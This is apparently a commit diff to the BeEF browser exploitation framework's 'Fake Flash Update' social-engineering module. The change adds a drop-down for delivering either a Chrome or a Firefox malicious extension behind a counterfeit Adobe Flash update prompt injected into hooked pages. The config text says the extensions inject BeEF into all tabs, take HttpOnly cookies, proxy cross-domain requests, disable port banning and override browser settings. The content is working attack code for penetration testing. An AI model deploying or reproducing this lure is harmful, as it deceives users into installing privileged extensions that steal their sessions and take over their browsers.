Modified Fake_flash_update module (with drop-down menu) to support Firefox Extension delivery.

modules/social_engineering/fake_flash_update/command.js

@@ -16,11 +16,27 @@
 beef.execute(function() {
   
   	// Grab image and payload from config
-  	image = "<%== @image %>";
-  	payload = "<%== @payload %>";
+  	var image = "<%== @image %>";
+    var payload_type = "<%== @payload %>";
+    var payload_root =  "<%== @payload_root %>";
+
+    var chrome_extension = "/demos/adobe_flash_update.crx";
+    var firefox_extension = "/api/ipec/ff_extension";
+    var payload = "";
+    switch (payload_type) {
+        case "Chrome_Extension":
+            payload = payload_root + chrome_extension;
+            break;
+        case "Firefox_Extension":
+            payload = payload_root + firefox_extension;
+            break;
+        default:
+            beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=Error. No Payload selected.');
+            break;
+    }
 
   	// Add div to page
-	div = document.createElement('div');
+    var div = document.createElement('div');
 	div.setAttribute('id', 'splash');
 	div.setAttribute('style', 'position:absolute; top:30%; left:40%;');
 	div.setAttribute('align', 'center');
@@ -28,6 +44,6 @@ beef.execute(function() {
 	div.innerHTML= '<a href=\'' + payload + '\' ><img src=\''+ image +'\'  /></a>';
     $j("#splash").click(function () {
       $j(this).hide();
-      beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');
     });
 });

modules/social_engineering/fake_flash_update/config.yaml

@@ -19,7 +19,7 @@ beef:
             enable: true
             category: "Social Engineering"
             name: "Fake Flash Update"
-            description: "Prompts the user to install an update to Adobe Flash Player.<br />The default install file is a Chrome extension. <br /><br /> A chrome extenstion has privileged access and can do a whole lot.. <ul><li>- Access all tabs and inject beef into all tabs</li><li>- Use hooked browser as a proxy to do cross domain requests</li><li>- Get all cookies including HTTPonly cookies</li></ul><br />See chrome extensions beef modules for more examples<br />See extensions/demos/flash_update_chrome_extension for extension source. <b>Note</b>: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded."
-            authors: ["mh"]
+            description: "Prompts the user to install an update to Adobe Flash Player.<br />The file to be delivered could be a Chrome or Firefox extension. <br /><br /> A Chrome extension has privileged access and can do a whole lot.. <ul><li>- Access all tabs and inject beef into all tabs</li><li>- Use hooked browser as a proxy to do cross domain requests</li><li>- Get all cookies including HTTPonly cookies</li></ul><br />See chrome extensions beef modules for more examples<br />See extensions/demos/flash_update_chrome_extension for extension source. <b>Note</b>: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded.<br /><br />The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages.<br />See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source."
+            authors: ["mh", "antisnatchor"]
             target:
                 user_notify: ['ALL']

modules/social_engineering/fake_flash_update/module.rb

@@ -17,12 +17,16 @@ class Fake_flash_update < BeEF::Core::Command
   
   def self.options
     configuration = BeEF::Core::Configuration.instance
-    payload = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.crx"
+    payload_root = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}"
     image = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.png"
 
     return [
-        {'name' =>'payload', 'description' =>'Location of the chrome extension that user is promted to install', 'ui_label'=>'Chrome extension', 'value' => payload},
-        {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image}
+        {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image},
+        {'name' =>'payload_root', 'description' =>'BeEF (Payload) root path', 'ui_label'=>'BeEF (Payload) root path', 'value' => payload_root},
+        { 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
+          'store_fields' => ['payload'], 'store_data' => [['Chrome_Extension'],['Firefox_Extension']],
+          'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true
+        }
 
     ]
   end